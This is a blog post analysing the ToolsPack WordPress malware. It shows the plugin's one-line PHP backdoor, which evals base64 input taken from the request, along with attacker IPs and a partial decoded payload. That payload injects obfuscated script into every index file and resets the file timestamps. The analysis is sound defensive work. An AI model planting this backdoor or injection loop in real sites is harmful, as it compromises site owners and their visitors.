How do WordPress sites get ToolsPack malware?

ToolsPack plugin is bad stuff…

 

Symptoms:

Your index.php file(s) get JavaScript with something like this at the top:

<script>if(window.document)aa=new RegExp('test','i').toString();aaa='/...

Then, after cleaning, it returns. Plus you get BlackListed by Google.

How does your index.php file get overwritten? Then, if you fix, how does the same file get replaced again? It is maddening.

Anyway – I don’t know where my client picked it up, but sitting there in the plugins directory, all pretty and capitalized, was

plugins/ToolsPack/

with one small file: toolspack.php containing this (oh man) :

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

Hmmm…

Checking the log files for several day periods showed several different IP addresses hitting that toolspack.php:

83.69.224.223
87.118.108.202
78.29.15.137

Seems the hackers are interested only in the base index.php and the wp-admin/index.php

Actually, you will see later in the code, the hackers are editing every index.php from the root path on down.

Hmmm…

Get rid of it? …Delete it? …Ha! NO! Let’s have some fun.

Besides, I still don’t know what other files and things they have … Lets see what it does. So I edited their ToolsPack: defanged it and logged their owned stuff:

I logged the Date/Time IP Address and Payload:

February 20, 2012, 3:19 pm - 87.118.108.202 -  - ZXJyb3JfcmVwb3J0aW5nK... Long Block of junk --
why base64 hide it?

Base 64 Decoding shows how they can overwrite the file:

First, get the starting root directory and save the payload in a variable named $iframe…

Full Source truncated … you get the idea… BTW (Nice indenting, for a virus…)

1) Get the starting root directory and save the payload in a variable named $iframe…

2) Then loop through all directories and search for a file named like “index.”

3) Read the file contents, and blank out any <script> content:

4) Now insert the payload from above at the top and put the file back…

5) Finally, cover the tracks by reverting the file time to the original… really evil

 

error_reporting(0);
$dirs[]    = $dir    = "$_SERVER[DOCUMENT_ROOT]";
$iframe    = "<script>if(window.document)aa=/s/g.exec(\"s\").index+[];aaa='0'...

   if ( eregi("^index\.", $file) )
      {
        //
       $file_content    = file_get_contents("$key/$file");
       //  
       $file_content    = preg_replace("/^<script>(.*)<\/script>/iU", "", $file_content);

       //
       $fp         = fopen("$key/$file", "wb");
       if (fwrite($fp, $iframe.$file_content))
               $success += 1;
                fclose($fp);

                touch("$key/$file", $old_time);
                }

Proactive technologist.

Posted in Wordpress

One Response to "How do WordPress sites get ToolsPack malware?"

What do you think?